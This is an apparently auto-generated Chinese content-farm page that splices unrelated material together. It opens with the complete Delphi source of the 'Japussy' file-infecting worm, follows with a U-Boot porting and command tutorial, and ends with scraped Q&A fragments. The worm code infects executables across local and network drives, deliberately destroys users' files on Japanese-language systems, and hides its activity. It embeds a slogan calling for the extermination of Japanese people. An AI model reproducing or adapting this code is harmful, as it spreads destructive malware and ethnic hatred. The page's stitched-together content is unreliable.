资讯
HOME
资讯
正文内容
nand read offset 熊猫烧香代码
发布时间 : 2024-11-23
作者 : 小编
访问数量 : 23
扫码分享至微信

熊猫烧香代码

program Japussy;

uses

Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};

const

HeaderSize = 82432; //病毒体的大小

IconOffset = $12EB8; //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同

//查找2800000020的十六进制字符串可以找到主图标的偏移量

{

HeaderSize = 38912; //Upx压缩过病毒体的大小

IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe

}

IconSize = $2E8; //PE文件主图标的大小--744字节

IconTail = IconOffset + IconSize; //PE文件主图标的尾部

ID = $44444444; //感染标记

//垃圾码,以备写入

Catchword = 'If a race need to be killed out, it must be Yamato. ' +

'If a country need to be destroyed, it must be Japan! ' +

'*** W32.Japussy.Worm.A ***';

{$R *.RES}

function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;

stdcall; external 'Kernel32.dll'; //函数声明

var

TmpFile: string;

Si: STARTUPINFO;

Pi: PROCESS_INFORMATION;

IsJap: Boolean = False; //日文操作系统标记

{ 判断是否为Win9x }

function IsWin9x: Boolean;

var

Ver: TOSVersionInfo;

begin

Result := False;

Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);

if not GetVersionEx(Ver) then

Exit;

if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x

Result := True;

end;

{ 在流之间复制 }

procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;

dStartPos: Integer; Count: Integer);

var

sCurPos, dCurPos: Integer;

begin

sCurPos := Src.Position;

dCurPos := Dst.Position;

Src.Seek(sStartPos, 0);

Dst.Seek(dStartPos, 0);

Dst.CopyFrom(Src, Count);

Src.Seek(sCurPos, 0);

Dst.Seek(dCurPos, 0);

end;

{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }

procedure ExtractFile(FileName: string);

var

sStream, dStream: TFileStream;

begin

try

sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

dStream := TFileStream.Create(FileName, fmCreate);

try

sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分

dStream.CopyFrom(sStream, sStream.Size - HeaderSize);

finally

dStream.Free;

end;

finally

sStream.Free;

end;

except

end;

end;

{ 填充STARTUPINFO结构 }

procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);

begin

Si.cb := SizeOf(Si);

Si.lpReserved := nil;

Si.lpDesktop := nil;

Si.lpTitle := nil;

Si.dwFlags := STARTF_USESHOWWINDOW;

Si.wShowWindow := State;

Si.cbReserved2 := 0;

Si.lpReserved2 := nil;

end;

{ 发带毒邮件 }

procedure SendMail;

begin

//哪位仁兄愿意完成之?

end;

{ 感染PE文件 }

procedure InfectOneFile(FileName: string);

var

HdrStream, SrcStream: TFileStream;

IcoStream, DstStream: TMemoryStream;

iID: LongInt;

aIcon: TIcon;

Infected, IsPE: Boolean;

i: Integer;

Buf: array[0..1] of Char;

begin

try //出错则文件正在被使用,退出

if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染

Exit;

Infected := False;

IsPE := False;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

try

for i := 0 to $108 do //检查PE文件头

begin

SrcStream.Seek(i, soFromBeginning);

SrcStream.Read(Buf, 2);

if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记

begin

IsPE := True; //是PE文件

Break;

end;

end;

SrcStream.Seek(-4, soFromEnd); //检查感染标记

SrcStream.Read(iID, 4);

if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染

Infected := True;

finally

SrcStream.Free;

end;

if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出

Exit;

IcoStream := TMemoryStream.Create;

DstStream := TMemoryStream.Create;

try

aIcon := TIcon.Create;

try

//得到被感染文件的主图标(744字节),存入流

aIcon.ReleaseHandle;

aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);

aIcon.SaveToStream(IcoStream);

finally

aIcon.Free;

end;

SrcStream := TFileStream.Create(FileName, fmOpenRead);

//头文件

HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);

try

//写入病毒体主图标之前的数据

CopyStream(HdrStream, 0, DstStream, 0, IconOffset);

//写入目前程序的主图标

CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);

//写入病毒体主图标到病毒体尾部之间的数据

CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);

//写入宿主程序

CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);

//写入已感染的标记

DstStream.Seek(0, 2);

iID := $44444444;

DstStream.Write(iID, 4);

finally

HdrStream.Free;

end;

finally

SrcStream.Free;

IcoStream.Free;

DstStream.SaveToFile(FileName); //替换宿主文件

DstStream.Free;

end;

except;

end;

end;

{ 将目标文件写入垃圾码后删除 }

procedure SmashFile(FileName: string);

var

FileHandle: Integer;

i, Size, Mass, Max, Len: Integer;

begin

try

SetFileAttributes(PChar(FileName), 0); //去掉只读属性

FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件

try

Size := GetFileSize(FileHandle, nil); //文件大小

i := 0;

Randomize;

Max := Random(15); //写入垃圾码的随机次数

if Max < 5 then

Max := 5;

Mass := Size div Max; //每个间隔块的大小

Len := Length(Catchword);

while i < Max do

begin

FileSeek(FileHandle, i * Mass, 0); //定位

//写入垃圾码,将文件彻底破坏掉

FileWrite(FileHandle, Catchword, Len);

Inc(i);

end;

finally

FileClose(FileHandle); //关闭文件

end;

DeleteFile(PChar(FileName)); //删除之

except

end;

end;

{ 获得可写的驱动器列表 }

function GetDrives: string;

var

DiskType: Word;

D: Char;

Str: string;

i: Integer;

begin

for i := 0 to 25 do //遍历26个字母

begin

D := Chr(i + 65);

Str := D + ':';

DiskType := GetDriveType(PChar(Str));

//得到本地磁盘和网络盘

if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then

Result := Result + D;

end;

end;

{ 遍历目录,感染和摧毁文件 }

procedure LoopFiles(Path, Mask: string);

var

i, Count: Integer;

Fn, Ext: string;

SubDir: TStrings;

SearchRec: TSearchRec;

Msg: TMsg;

function IsValidDir(SearchRec: TSearchRec): Integer;

begin

if (SearchRec.Attr <> 16) and (SearchRec.Name <> '.') and

(SearchRec.Name <> '..') then

Result := 0 //不是目录

else if (SearchRec.Attr = 16) and (SearchRec.Name <> '.') and

(SearchRec.Name <> '..') then

Result := 1 //不是根目录

else Result := 2; //是根目录

end;

begin

if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then

begin

repeat

PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑

if IsValidDir(SearchRec) = 0 then

begin

Fn := Path + SearchRec.Name;

Ext := UpperCase(ExtractFileExt(Fn));

if (Ext = '.EXE') or (Ext = '.SCR') then

begin

InfectOneFile(Fn); //感染可执行文件

end

else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then

begin

//感染HTML和ASP文件,将Base64编码后的病毒写入

//感染浏览此网页的所有用户

//哪位大兄弟愿意完成之?

end

else if Ext = '.WAB' then //Outlook地址簿文件

begin

//获取Outlook邮件地址

end

else if Ext = '.ADC' then //Foxmail地址自动完成文件

begin

//获取Foxmail邮件地址

end

else if Ext = 'IND' then //Foxmail地址簿文件

begin

//获取Foxmail邮件地址

end

else

begin

if IsJap then //是倭文操作系统

begin

if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or

(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or

(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or

(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or

(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or

(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then

SmashFile(Fn); //摧毁文件

end;

end;

end;

//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑

Sleep(200);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

SubDir := TStringList.Create;

if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then

begin

repeat

if IsValidDir(SearchRec) = 1 then

SubDir.Add(SearchRec.Name);

until (FindNext(SearchRec) <> 0);

end;

FindClose(SearchRec);

Count := SubDir.Count - 1;

for i := 0 to Count do

LoopFiles(Path + SubDir.Strings[i] + '', Mask);

FreeAndNil(SubDir);

end;

{ 遍历磁盘上所有的文件 }

procedure InfectFiles;

var

DriverList: string;

i, Len: Integer;

begin

if GetACP = 932 then //日文操作系统

IsJap := True; //去死吧!

DriverList := GetDrives; //得到可写的磁盘列表

Len := Length(DriverList);

while True do //死循环

begin

for i := Len downto 1 do //遍历每个磁盘驱动器

LoopFiles(DriverList[i] + ':', '*.*'); //感染之

SendMail; //发带毒邮件

Sleep(1000 * 60 * 5); //睡眠5分钟

end;

end;

{ 主程序开始 }

begin

if IsWin9x then //是Win9x

RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程

else //WinNT

begin

//远程线程映射到Explorer进程

//哪位兄台愿意完成之?

end;

//如果是原始病毒体自己

if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then

InfectFiles //感染和发邮件

else //已寄生于宿主程序上了,开始工作

begin

TmpFile := ParamStr(0); //创建临时文件

Delete(TmpFile, Length(TmpFile) - 4, 4);

TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格

ExtractFile(TmpFile); //分离之

FillStartupInfo(Si, SW_SHOWDEFAULT);

CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,

0, nil, '.', Si, Pi); //创建新进程运行之

InfectFiles; //感染和发邮件

end;

end.

Linux系统移植之—uboot移植,你们要的uboot终于来了,堪称精品

作为一名过来人,uboot、kernel对每个学linux的来说都有很深的情谊,因为它们是一个系统跑起来的最基础,每个学linux的都会首先接触到。而它们本身就是一个精美的小系统,里边代码所体现的逻辑、算法以及每个绝妙的C知识点都让你沉醉其中。

uboot 属于bootloader的一种,是用来引导启动内核的,它的最终目的就是,从flash中读出内核,放到内存中,启动内核。具体内容如下:

1 u­boot 的介绍及系统结构

1.1 u­boot 介绍

1.2 获取 u­boot

1.3 u­boot 体系结构

1.3.1 u­boot 目录结构

2 uboot 的启动过程及工作原理

2.1 启动模式介绍

2.2 阶段 1 介绍

2.2.1 定义入口

2.2.2 设置异常向量

2.2.3 设置 CPU 的模式为 SVC 模式

2.2.4 关闭看门狗

2.2.5 禁掉所有中断

2.2.6 设置以 CPU 的频率

2.2.7 设置 CP15

2.2.8 配置内存区控制寄存器

2.2.9 安装 U­BOOT 使的栈空间

2.2.10 BSS 段清 0

2.2.11 搬移 Nand Flash 代码

2.2.12 进入 C 代码部分

2.3 阶段 2 的 C 语言代码部分 

2.3.1 调用一系列的初始化函数

2.3.2 初始化网络设备

2.3.3 进入主 UBOOT 命令行

2.4 代码搬运

3 uboot 的移 植过程

3.1 环境

3.2 步骤

3.2.1 修改 Makefile

3.2.2 在 board 子目录中建立 crane2410

3.2.3 在 include/configs/中建立配置头文件

3.2.4 指定交叉编译工具的路径

3.2.5 测试编译能否成功

3.2.6 修改 lowlevel_init.S 文件

2.9 UBOOT 的 Nand Flash 移植

3.2.8 重新编译 u­boot

3.2.9 把 u­boot 烧入 flash

4.2 常用命令使用说明

4.2.1 askenv(F)

在标准输入(stdin)获得环境变量。

4.2.2 autoscr

从内存(Memory)运行脚本。(注意,从下载地址开始,例如我们的开发板是从 0x30008000 处开始运

行).

CRANE2410 # autoscr 0x30008000

## Executing script at 30008000

4.2.3 base

打印或者设置当前指令与下载地址的地址偏移。

4.2.4 bdinfo

打印开发板信息

CRANE2410 # bdinfo

-arch_number = 0x000000C1 (CPU 体系结构号)

-env_t = 0x00000000 (环境变量)

-boot_params = 0x30000100 (启动引导参数)

-DRAM bank = 0x00000000 (内存区)

--> start = 0x30000000 (SDRAM 起始地址)

--> size = 0x04000000 (SDRAM 大小)

-ethaddr = 01:23:45:67:89:AB (以太网地址)

-ip_addr = 192.168.1.5 (IP 地址)

-baudrate = 115200 bps (波特率)

4.2.5 bootp

通过网络使用 Bootp 或者 TFTP 协议引导境像文件。

CRANE2410 # help bootp

bootp [loadAddress] [bootfilename]

4.2.6 bootelf

默认从 0x30008000 引导 elf 格式的文件(vmlinux)

CRANE2410 # help bootelf

bootelf [address] - load address of ELF image.

4.2.7 bootd(=boot)

引导的默认命令,即运行 U-BOOT 中在“include/configs/smdk2410.h” 中设置的“bootcmd” 中

的命令。如下:

#define CONFIG_BOOTCOMMAND "tftp 0x30008000 uImage; bootm 0x30008000";

在命令下做如下试验:

CRANE2410 # set bootcmd printenv

CRANE2410 # boot

bootdelay=3

baudrate=115200

ethaddr=01:23:45:67:89:abCRANE2410 # bootd

bootdelay=3

baudrate=115200

ethaddr=01:23:45:67:89:ab

4.2.8 tftp(tftpboot)

即将内核镜像文件从 PC 中下载到 SDRAM 的指定地址,然后通过 bootm 来引导内核,前提是所用 PC 要安装设

置 tftp 服务。

下载信息:

CRANE2410 # tftp 0x30008000 zImage

TFTP from server 10.0.0.1; our IP address is 10.0.0.110

Filename 'zImage'.

Load address: 0x30008000

Loading: #################################################################

#################################################################

#################################################

done

Bytes transferred = 913880 (df1d8 hex)

4.2.9 bootm

内核的入口地址开始引导内核。

CRANE2410 # bootm 0x30008000

## Booting image at 30008000 ...

Starting kernel ...

Uncompressing

Linux......................................................................

done, .

4.2.10 go

直接跳转到可执行文件的入口地址,执行可执行文件。

CRANE2410 # go 0x30008000

## Starting application at 0x30008000 ...

4.2.11 cmp

对输入的两段内存地址进行比较。

CRANE2410 # cmp 0x30008000 0x30008040 64

word at 0x30008000 (0xe321f0d3) != word at 0x30008040 (0xc022020c)

Total of 0 words were the same

CRANE2410 # cmp 0x30008000 0x30008000 64

Total of 100 words were the same

4.2.12 coninfo

打印所有控制设备和信息,例如

-List of available devices:

-serial 80000003 SIO stdin stdout stderr

4.2.13 cp

内存拷贝,cp 源地址 目的地址 拷贝大小(字节)

CRANE2410 # help cp

cp [.b, .w, .l] source target count

ANE2410 # cp 0x30008000 0x3000f000 644.2.14 date

获得/设置/重设日期和时间

CRANE2410 # date

Date: 2006-6-6 (Tuesday) Time: 06:06:06

4.2.15 erase(F)

擦除 FLASH MEMORY, 由于该 ARM 板没有 Nor Flash, 所有不支持该命令.

CRANE2410 # help erase

erase start end

- erase FLASH from addr 'start' to addr 'end'

erase start +len

- erase FLASH from addr 'start' to the end of sect w/addr 'start'+'len'-1

erase N:SF[-SL]

- erase sectors SF-SL in FLASH bank # N

erase bank N

- erase FLASH bank # N

erase all

- erase all FLASH banks

4.2.16 flinfo(F)

打印 Nor Flash 信息, 由于该 ARM 板没有 Nor Flash, 所有不支持该命令.

4.2.17 iminfo

打印和校验内核镜像头, 内核的起始地址由 CFG_LOAD_ADDR 指定:

#define CFG_LOAD_ADDR 0x30008000 /* default load address */

该宏在 include/configs/crane2410.h 中定义.

CRANE2410 # iminfo

## Checking Image at 30008000 ...

Image Name: Linux-2.6.14.1

Created: 2006-06-28 7:43:01 UTC

Image Type: ARM Linux Kernel Image (uncompressed)

Data Size: 1047080 Bytes = 1022.5 kB

Load Address: 30008000

Entry Point: 30008040

Verifying Checksum ... OK

4.2.18 loadb

从串口下载二进制文件

CRANE2410 # loadb

## Ready for binary (kermit) download to 0x30008000 at 115200 bps...

## Total Size = 0x00000000 = 0 Bytes

## Start Addr = 0x30008000

4.2.19 md

显示指定内存地址中的内容

CRANE2410 # md 0

00000000: ea000012 e59ff014 e59ff014 e59ff014 ................

00000010: e59ff014 e59ff014 e59ff014 e59ff014 ................

00000020: 33f80220 33f80280 33f802e0 33f80340 ..3...3...3@..3

00000030: 33f803a0 33f80400 33f80460 deadbeef ...3...3`..3....

00000040: 33f80000 33f80000 33f9c0b4 33fa019c ...3...3...3...3

00000050: e10f0000 e3c0001f e38000d3 e129f000 ..............).00000060: e3a00453 e3a01000 e5801000 e3e01000 S...............

00000070: e59f0444 e5801000 e59f1440 e59f0440 D.......@...@...

00000080: e5801000 e59f043c e3a01003 e5801000 ....<...........

00000090: eb000051 e24f009c e51f1060 e1500001 Q.....O.`.....P.

000000a0: 0a000007 e51f2068 e51f3068 e0432002 ....h ..h0... C.

000000b0: e0802002 e8b007f8 e8a107f8 e1500002 . ............P.

000000c0: dafffffb e51f008c e2400803 e2400080 ..........@...@.

000000d0: e240d00c e51f0094 e51f1094 e3a02000 ..@.......... ..

000000e0: e5802000 e2800004 e1500001 dafffffb . ........P.....

000000f0: eb000006 e59f13d0 e281f000 e1a00000 ................

4.2.20 mm

顺序显示指定地址往后的内存中的内容,可同时修改,地址自动递增。

CRANE2410 # mm 0x30008000

30008000: e1a00000 ? fffff

30008004: e1a00000 ? eeeeee

30008008: e1a00000 ? q

CRANE2410 # md 30008000

30008000: 000fffff 00eeeeee e1a00000 e1a00000 ................

30008010: e1a00000 e1a00000 e1a00000 e1a00000 ................

30008020: ea000002 016f2818 00000000 000df1d8 .....(o.........

30008030: e1a07001 e3a08000 e10f2000 e3120003 .p....... ......

4.2.21 mtest

简单的 RAM 检测

CRANE2410 # mtest

Pattern FFFFFFFD Writing... Reading...

4.2.22 mw

向内存地址写内容

CRANE2410 # md 30008000

30008000: ffffdffd ffffdffc ffffdffb ffffdffa ................

CRANE2410 # mw 30008000 0 4

CRANE2410 # md 30008000

30008000: 00000000 00000000 00000000 00000000 ................

4.2.23 nm

修改内存地址, 地址不递增

CRANE2410 # nm 30008000

30008000: de4c457f ? 00000000

30008000: 00000000 ? 11111111

30008000: 11111111 ?

4.2.24 printenv

打印环境变量

CRANE2410 # printenv

bootdelay=3

baudrate=115200

ethaddr=01:23:45:67:89:ab

ipaddr=10.0.0.110

serverip=10.0.0.1

netmask=255.255.255.0

stdin=serial

stdout=serialstderr=serial

Environment size: 153/65532 bytes

4.2.25 ping

ping 主机

CRANE2410 # ping 10.0.0.1

host 10.0.0.1 is alive

4.2.26 reset

复位 CPU

4.2.27 run

运行已经定义好的 U-BOOT 的命令

CRANE2410 # set myenv ping 10.0.0.1

CRANE2410 # run myenv

host 10.0.0.1 is alive

4.2.28 saveenv(F)

保存设定的环境变量

4.2.29 setenv

设置环境变量

CRANE2410 # setenv ipaddr 10.0.0.254

CRANE2410 # printenv

ipaddr=10.0.0.254

4.2.30 sleep

命令延时执行时间

CRANE2410 # sleep 1

4.2.31 version

打印 U-BOOT 版本信息

CRANE2410 # version

U-Boot 1.1.4 (Jul 4 2006 - 12:42:27)

4.2.32 nand info

打印 nand flash 信息

CRANE2410 # nand info

Device 0: Samsung K9F1208U0B at 0x4e000000 (64 MB, 16 kB sector)

4.2.33 nand device <n>

显示某个 nand 设备

CRANE2410 # nand device 0

Device 0: Samsung K9F1208U0B at 0x4e000000 (64 MB, 16 kB sector)

... is now current device

4.2.34 nand bad

CRANE2410 # nand bad

Device 0 bad blocks:4.2.35 nand read

nand read InAddr FlAddr size

InAddr: 从 nand flash 中读到内存的起始地址。

FlAddr: nand flash 的起始地址。

size: 从 nand flash 中读取的数据的大小。

CRANE2410 # nand read 0x30008000 0 0x100000

NAND read: device 0 offset 0, size 1048576 ...

1048576 bytes read: OK

4.2.36 nand erease

nand erase FlAddr size

FlAddr: nand flash 的起始地址

size: 从 nand flash 中擦除数据块的大小

CRANE2410 # nand erase 0x100000 0x20000

NAND erase: device 0 offset 1048576, size 131072 ... OK

4.2.37 nand write

nand write InAddr FlAddr size

InAddr: 写到 Nand Flash 中的数据在内存的起始地址

FlAddr: Nand Flash 的起始地址

size: 数据的大小

CRANE2410 # nand write 0x30f00000 0x100000 0x20000

NAND write: device 0 offset 1048576, size 131072 ...

131072 bytes written: OK

4.2.37 nboot

u-boot-1.1.4 代码对于 nboot 命令的帮助不正确,修改如下:

正确的顺序为:

nboot InAddr dev FlAddr

InAddr: 需要装载到的内存的地址。

FlAddr: 在 nand flash 上 uImage 存放的地址

dev: 设备号

需要提前设置环境变量,否则 nboot 不会调用 bootm

CRANE2410 #setenv autostart yes

CRANE2410 # nboot 30008000 0 100000

Loading from device 0: <NULL> at 0x4e000000 (offset 0x100000)

Image Name: Linux-2.6.14.3

Created: 2006-07-06 7:31:52 UTC

Image Type: ARM Linux Kernel Image (uncompressed)

Data Size: 897428 Bytes = 876.4 kB

Load Address: 30008000

Entry Point: 30008040

Automatic boot of image at addr 0x30008000 ...

## Booting image at 30008000 ...

Starting kernel ...

4.3 命令简写说明

所以命令都可以简写,只要命令前面的一部分不会跟其它命令相同,就可以不用写全整个命令.save 命令

CRANE2410 # sa

Saving Environment to Flash...

Un-Protected 1 sectors

Erasing Flash...Erasing sector 10 ... Erased 1 sectors

4.4 把文件写入 NandFlash

如果把一个传到内存中的文件写入到 Nand Flash 中, 如:新的 uboot.bin, zImage(内核),

rootfs 等, 如果做呢?我们可以用 Nand Flash 命令来完成. 但是 Nand Flash 写时,必须先要把 Nand

Flash 的写入区全部擦除后,才能写. 下面以把内存 0x30008000 起长度为 0x20000 的内容写到 Nand

Flash 中的 0x100000 为例.

CRANE2410 # nand erase 0x100000 20000

NAND erase: device 0 offset 1048576, size 131072 ... OK

CRANE2410 # nand write 0x30008000 0x100000 0x20000

NAND write: device 0 offset 1048576, size 131072 ...

131072 bytes written: OK

相关问答

英语翻译Thislistcontainssubmitteddrive readoffset sinaform...

[最佳回答]此列表包含提交的驱动器读取的格式与dBpowerAMP音乐转换器(DMC)和精确复制音频(选管会)兼容的偏移.贡献你的抵消容易配置您的CD驱动器AccurateRip...

...苹果标志时上方出现一系列英文,均以[ NAND ]开头的。-ZOL问答

[NAND]_FindFlashMediaAndkeepout:601physicalnandblockoffset1[NAND]start:356this0x97ba2400PROV...

java中如何把一个文件转化为byte数组 - 147****0316 的回答 -...

/***获得指定文件的byte数组*/publicbyte[]getBytes(StringfilePath){byte[]buffer=null;try{Filefile=ne...

关于java的inputStream究竟一次会读多少byte?

inputStream有多个read方法,带不同参数如果直接read(),只读一个字节如果read(byte[]),则看参数的数组有多长,就读多少,如果stream中的数据不够,那有多少...

不能直接写硬盘扇区了,写入用 - Microsoft Community

[回答]如果在对磁盘进行写操作的时候,遇到拒绝访问的提示,那么可能是权限的问题,因为Windows7权限的安装级别要高于WindowsXP很高的。我们可以先在开始...

linux驱动程序例子?

以下是一个简单的Linux驱动程序的示例:```c#include以下是一个简单的Linux驱动程序的示例:```c#include{printk(KERN_INFO"Devic...

python中file里面功能都有什么?

在Python的`file`对象中,一些常见的功能包括:1.`file.read(size=-1)`:读取文件中的内容。可选参数`size`指定读取的字节数,默认为读取整个文件。2.`file.r...

英语中颜色的不同表达英语中颜色的不同表达,有哪些? - 尧妮...

Hithere,it’sYangLiagain.Howareyou?Letmeaskyouaquestionfirst:What’syourfavouritecolour?Isitgreen;redo...

文件指针如何放回文件开头?

可以使用文件指针的seek()方法,此方法设置文件的当前位置偏移。它有两个参数:offset:文件的读/写指针位置偏移。whence:这是可选的,默认为0,这意...可以...

数值模拟计算时总是出现Attempt write to readonly memory蓝...

[回答]了解到您在使用Windows10出现的蓝屏问题。根据您提供的信息,我们无法准确的判断出蓝屏问题原因的具体所在,我们需要您提供您的minidump文件来分析您...

 神奇宝贝火箭队  atq 
王经理: 180-0000-0000(微信同号)
10086@qq.com
北京海淀区西三旗街道国际大厦08A座
©2024  上海羊羽卓进出口贸易有限公司  版权所有.All Rights Reserved.  |  程序由Z-BlogPHP强力驱动
网站首页
电话咨询
微信号

QQ

在线咨询真诚为您提供专业解答服务

热线

188-0000-0000
专属服务热线

微信

二维码扫一扫微信交流
顶部